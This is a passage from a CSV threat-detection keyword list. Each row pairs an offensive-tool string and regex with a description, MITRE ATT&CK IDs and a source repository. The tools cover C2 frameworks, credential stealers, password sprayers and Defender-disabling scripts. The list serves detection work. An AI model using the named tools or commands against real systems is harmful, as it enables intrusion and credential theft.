TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*pipx install fee",".{0,1000}pipx\sinstall\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*pipx upgrade 
autorecon*",".{0,1000}pipx\supgrade\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*Pitty Tiger RAT*",".{0,1000}Pitty\sTiger\sRAT.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*pivot_smb \*",".{0,1000}pivot_smb\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary 
Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pivot_winrm *",".{0,1000}pivot_winrm\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pivotnacci http*",".{0,1000}pivotnacci\s\shttp.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci -*",".{0,1000}pivotnacci\s\-.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci *--polling-interval*",".{0,1000}pivotnacci\s.{0,1000}\-\-polling\-interval.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - 
Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci/0.0.1*",".{0,1000}pivotnacci\/0\.0\.1.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","user-agent","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnaccilib*socks*",".{0,1000}pivotnaccilib.{0,1000}socks.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci-master*",".{0,1000}pivotnacci\-master.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivots/named-pipe_windows.go*",".{0,1000}pivots\/named\-pipe_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*-pk8gege.org*",".{0,1000}\-pk8gege\.org.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*pkexec64.tar.gz*",".{0,1000}pkexec64\.tar\.gz.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*PKINITtools.git*",".{0,1000}PKINITtools\.git.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*pkt_comm/word_gen.*",".{0,1000}pkt_comm\/word_gen\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*pkt_comm/word_list*",".{0,1000}pkt_comm\/word_list.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - 
advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*plackyhacker/CmdLineSpoofer*",".{0,1000}plackyhacker\/CmdLineSpoofer.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*Plazmaz/LNKUp*",".{0,1000}Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf file is clean*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf\sfile\sis\sclean.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - 
TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*Please Dont upload sample anywhere*Its been fifth time i am again making this script fud*",".{0,1000}Please\sDont\supload\ssample\sanywhere.{0,1000}Its\sbeen\sfifth\stime\si\sam\sagain\smaking\sthis\sscript\sfud.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Please select command [PASSWORDS/HISTORY/COOKIES/AUTOFILL/CREDIT_CARDS/BOOKMARKS]*",".{0,1000}Please\sselect\scommand\s\[PASSWORDS\/HISTORY\/COOKIES\/AUTOFILL\/CREDIT_CARDS\/BOOKMARKS\].{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers 
passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*'Please Turn off your Windows Defender'*",".{0,1000}\'Please\sTurn\soff\syour\sWindows\sDefender\'.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Please use the -Password option to specify a unique password to spray*",".{0,1000}Please\suse\sthe\s\-Password\soption\sto\sspecify\sa\sunique\spassword\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*Please use the -User option to specify a unique username to spray*",".{0,1000}Please\suse\sthe\s\-User\soption\sto\sspecify\sa\sunique\susername\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*plex_unpickle_dict_rce.*",".{0,1000}plex_unpickle_dict_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*plug_getpass_nps.dll*",".{0,1000}plug_getpass_nps\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_katz_nps.exe*",".{0,1000}plug_katz_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_qvte_nps.exe*",".{0,1000}plug_qvte_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plugins.nessus.org.*",".{0,1000}plugins\.nessus\.org\..{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*plugins/nemesis.rb*",".{0,1000}plugins\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Plugins\AccessTokens\TokenDriver*",".{0,1000}Plugins\\AccessTokens\\TokenDriver.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Plugins\AccessTokens\TokenManipulation*",".{0,1000}Plugins\\AccessTokens\\TokenManipulation.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Plugins\Execution\PSExec*",".{0,1000}Plugins\\Execution\\PSExec.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*plugins\ScreenControl.dll*",".{0,1000}plugins\\ScreenControl\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*Plugins\SendFile.dll*",".{0,1000}Plugins\\SendFile\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*Plugins\SendMemory.dll*",".{0,1000}Plugins\\SendMemory\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*plummm/CVE-2022-27666*",".{0,1000}plummm\/CVE\-2022\-27666.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation 
tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*pm3 -p /dev/ttyACM0*",".{0,1000}pm3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PME\LSA\*-LSA.txt*",".{0,1000}PME\\LSA\\.{0,1000}\-LSA\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PME\UserFiles\*-UserFiles.txt*",".{0,1000}PME\\UserFiles\\.{0,1000}\-UserFiles\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PoC To enumerate logged on users on a remote system using the winreg named pipe*",".{0,1000}PoC\sTo\senumerate\slogged\son\susers\son\sa\sremote\ssystem\susing\sthe\swinreg\snamed\spipe.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","8","8","N/A","N/A","N/A","N/A" "*poc.bash*",".{0,1000}poc\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bat*",".{0,1000}poc\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.bin*",".{0,1000}poc\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.exe*",".{0,1000}poc\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - 
T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.exe*poc.txt*",".{0,1000}poc\.exe.{0,1000}poc\.txt.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*poc.msi*",".{0,1000}poc\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.pl*",".{0,1000}poc\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","210","71","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*poc.ps1*",".{0,1000}poc\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 